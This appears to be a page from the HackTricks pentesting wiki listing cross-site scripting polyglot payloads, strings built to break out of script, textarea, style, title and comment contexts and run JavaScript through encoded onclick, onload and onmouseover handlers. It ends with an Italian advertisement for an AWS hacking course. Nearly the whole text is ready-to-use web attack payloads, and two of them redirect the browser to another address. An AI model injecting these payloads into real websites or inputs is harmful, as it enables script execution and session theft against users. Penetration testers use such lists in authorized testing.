javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=document.location=`//localhost/mH`//>
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

PreviousWeb Vulnerabilities MethodologyNextWeb Vulns List

Last updated